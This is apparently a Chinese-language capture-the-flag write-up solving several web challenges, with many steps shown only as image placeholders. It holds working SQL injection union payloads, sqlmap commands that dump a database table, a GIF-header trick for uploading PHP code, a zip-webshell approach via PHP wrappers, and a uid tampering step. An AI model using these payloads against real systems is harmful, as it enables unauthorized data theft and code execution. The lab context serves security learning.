Flag參數(shù)

• 解題步驟
  

  根據(jù)題目提示，通過POST的方式傳遞flag參數(shù)，回顯參數(shù)的值需要大于10位，因此傳遞大于10位的flag參數(shù)如下，獲得flag：
  image.png

input

• 解題步驟
  

  右鍵查看源代碼，發(fā)現(xiàn)js的check函數(shù)，閱讀源代碼，發(fā)現(xiàn)輸入的flag值要與str字符串的結(jié)果一致，才能通過，直接丟進(jìn)控制臺(tái)，打印str變量的值獲得flag的值：
  image.png

企業(yè)小白運(yùn)維人員

• 解題步驟
  

  訪問首頁，右鍵查看源代碼，根據(jù)提示訪問網(wǎng)站的備份文件，右鍵查看源代碼，根據(jù)代碼內(nèi)容傳遞user和password兩個(gè)參數(shù)即可獲得flag：
  image.png

100塊錢都不給我

image.png

image.png

image.png

搜what?

• 解題步驟
  查看頁面發(fā)現(xiàn)可能SQL注入，通過POST傳值獲得flag：
  word=1'or 1=1 order by 3#&&number=5查詢字段數(shù)為3
  word=1'or 1=1 union select 1,2,3#&&number=5三個(gè)字段的結(jié)果都回顯
  word=1'or 1=1 union select 1,table_name,3 from information_schema.tables where table_schema=database()#&&number=5查詢到admin和news兩張表
  word=1'or 1=1 union select 1,column_name,3 from information_schema.columns where table_name='admin'#&&number=5查詢admin表的字段名，發(fā)現(xiàn)有flag字段
  word=1'or 1=1 union select 1,flag,3 from admin#&&number=5查詢到flag字段的值

來上傳!

通過上傳測(cè)試，發(fā)現(xiàn)是文件頭校驗(yàn)，因此抓包，在木馬內(nèi)容基礎(chǔ)上再加gif文件頭，結(jié)構(gòu)如下：GIF89a<?php phpinfo(); ?>

image.png

包羅萬象

發(fā)現(xiàn)可以上傳zip文件，構(gòu)造一句話木馬的壓縮包，然后用php偽協(xié)議讀取執(zhí)行命令，用base64命令讀取flag.php源代碼獲取flag：

image.png

flag.php

阿！核彈

• 解題步驟
  

  訪問根據(jù)題目默認(rèn)的賬號(hào)密碼登錄進(jìn)入，發(fā)現(xiàn)有flag按鈕，點(diǎn)擊提示沒有權(quán)限，控制臺(tái)查看流量包發(fā)現(xiàn)存在ownerbug和flag.do，查看第二個(gè)包
  flag.do請(qǐng)求頭
  flag.do響應(yīng)頭
  
  
  當(dāng)傳入uid參數(shù)為1000時(shí)候，響應(yīng)是"owner_bugs"，修改uid參數(shù)為1時(shí)候，回顯是flag，
  image.png
  根據(jù)提示，訪問flag目錄，獲得flag：
  image.png

本題考察的是linux的越權(quán)控制，在登錄Linux時(shí)，看起來是登錄的賬號(hào)，其實(shí)在計(jì)算機(jī)中僅僅認(rèn)識(shí)ID,而每個(gè)登錄的用戶都會(huì)取得兩個(gè)
ID這就是GID與UID。UID也稱為用戶ID(UserID),GID也稱為用戶組ID(Group ID)。操作系統(tǒng)就是利用它兩來判斷文件的所有者與用戶組的。用戶的UID大于500的都是非系統(tǒng)賬號(hào)，500以下的都為系統(tǒng)保留的賬號(hào)，比如root賬號(hào)，至高權(quán)限的賬號(hào)的UID為0。

這密碼到底是啥！

• 解題步驟bp抓包，右鍵發(fā)送到sqlmap進(jìn)行攻擊：
  sqlmap.py -r C:\Users\DELL\AppData\Local\Temp\\1548293714030.req --dbs發(fā)現(xiàn)有information_schema和manager_haha兩個(gè)數(shù)據(jù)庫，對(duì)第二個(gè)數(shù)據(jù)庫爆表名：
  sqlmap.py -r C:\Users\DELL\AppData\Local\Temp\\1548293714030.req -D manager_haha --tables發(fā)現(xiàn)有admin表，繼續(xù)爆破字段名：
  sqlmap.py -r C:\Users\DELL\AppData\Local\Temp\\1548293714030.req -D manager_haha -T admin --columns發(fā)現(xiàn)有可疑字段名：f149_k3y,接著爆破字段值：
  sqlmap.py -r C:\Users\DELL\AppData\Local\Temp\\1548293714030.req -D manager_haha -T admin -C f149_k3y --dump結(jié)果如下：
  
  flag.png

看你有什么辦法

• 解題步驟
  根據(jù)首頁源代碼提示訪問index.bak頁面，查看源代碼，發(fā)現(xiàn)關(guān)鍵代碼：

<?php
function filter($v){
  echo $v;
  $w = array('<','>','\.\.','^/+.*','file:///','php://','data://','zip://','ftp://','phar://','zlib://','glob://','expect://','http://','https://');
  $w = implode('|',$w);
  if(preg_match('#' . $w . '#i',$v) !== 0){
    die("
not that easy.");
    exit();
  }
  return $v;
}

根據(jù)代碼可知過濾了超多的協(xié)議，其中
file://協(xié)議
都為off狀態(tài)下也可以使用，直接訪問本地文件系統(tǒng)。
格式：file:// [文件的絕對(duì)路徑和文件名]
例如：file://localhost/文件
這里需要用到遠(yuǎn)程文件包含，但因?yàn)椴荒苡胕p地址（因?yàn)榘袡C(jī)無無法訪問外網(wǎng)ip），所以用localhost代替
原版協(xié)議：https://en.wikipedia.org/wiki/File_URI_scheme

file協(xié)議.png

image.png

dota

• 解題步驟
  根據(jù)提示猜測(cè)源代碼泄漏，訪問www.zip獲取源代碼，下載解壓發(fā)現(xiàn)有flag.php文件，打開得到flag：
  flag.png

X集團(tuán)超級(jí)無敵新聞網(wǎng)站

• 解題步驟
  

  掃描后臺(tái)，發(fā)現(xiàn)敏感目錄：
  image.png
  訪問admin/left.jsp會(huì)重定向跳轉(zhuǎn)回admin這個(gè)登陸界面，查看源代碼發(fā)現(xiàn)有網(wǎng)頁跳轉(zhuǎn)js代碼，如下：
  跳轉(zhuǎn).png

admin/left.jsp

admin.png

flag.png